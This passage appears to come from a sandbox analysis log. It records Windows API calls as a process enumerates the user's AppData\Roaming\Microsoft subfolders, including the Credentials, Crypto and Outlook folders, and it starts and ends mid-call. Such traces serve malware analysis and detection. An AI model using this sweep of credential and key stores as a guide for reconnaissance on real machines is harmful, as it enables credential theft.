dwReserved0=0x0, dwReserved1=0x0, cFileName="Style", cAlternateFileName="")) returned 0 [0281.486] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.486] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.486] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x38 [0281.487] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.487] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials", lpFilePart=0x0) returned 0x38 [0281.487] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.487] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.487] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0281.487] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.488] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", lpFilePart=0x0) returned 0x33 [0281.488] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.488] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto", lpFilePart=0x0) returned 0x33 [0281.488] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.488] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.488] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 1 [0281.488] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x5af83960, ftLastWriteTime.dwHighDateTime=0x1cb8930, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA", cAlternateFileName="")) returned 0 [0281.488] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.488] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.489] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpFilePart=0x0) returned 0x45 [0281.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.489] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpFilePart=0x0) returned 0x45 [0281.489] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.489] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.489] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0281.489] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 0 [0281.489] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.489] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.489] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", lpFilePart=0x0) returned 0x32 [0281.489] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.490] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel", lpFilePart=0x0) returned 0x32 [0281.490] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.490] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.490] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0281.490] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0281.490] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.490] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.490] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3e [0281.490] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.490] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer", lpFilePart=0x0) returned 0x3e [0281.491] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Internet Explorer\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.491] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.491] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 1 [0281.491] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x4d24b360, ftLastAccessTime.dwHighDateTime=0x1d7b064, ftLastWriteTime.dwLowDateTime=0x4d24b360, ftLastWriteTime.dwHighDateTime=0x1d7b064, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Quick Launch", cAlternateFileName="QUICKL~1")) returned 0 [0281.491] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.491] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.491] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x34 [0281.491] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.491] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network", lpFilePart=0x0) returned 0x34 [0281.491] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.492] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.492] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 1 [0281.492] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Connections", cAlternateFileName="CONNEC~1")) returned 0 [0281.492] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.492] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.492] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", lpFilePart=0x0) returned 0x33 [0281.492] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.492] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office", lpFilePart=0x0) returned 0x33 [0281.493] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.493] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.493] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2868d050, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2868d050, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2868d050, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x9362, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSO1033.acl", cAlternateFileName="")) returned 1 [0281.494] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0281.494] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2b32ecd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b413510, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b413510, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 0 [0281.494] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.495] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x34 [0281.495] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.495] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", nBufferLength=0x105, lpBuffer=0x43e4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook", lpFilePart=0x0) returned 0x34 [0281.495] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Outlook\\*", lpFindFileData=0x43e770 | out: lpFindFileData=0x43e770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x59c298 [0281.495] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0281.495] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x53aa4cd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x53aa4cd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a502870, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0xa00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.srs", cAlternateFileName="")) returned 1 [0281.495] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5b267fb0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3a907d30, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x93e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook.xml", cAlternateFileName="")) returned 1 [0281.495] FindNextFileW (in: hFindFile=0x59c298, lpFindFileData=0x43e778 | out: lpFindFileData=0x43e778*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0281.495] FindClose (in: hFindFile=0x59c298 | out: hFindFile=0x59c298) returned 1 [0281.495] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e730) returned 1 [0281.496] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x43e990) returned 1 [0281.496] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", nBufferLength=0x105, lpBuffer=0x43e4dc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Proof", lpFilePart=0x0) returned 0x32 [0281.496] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x43e9c0) returned 1 [0281.496] GetFullPathNameW (in: 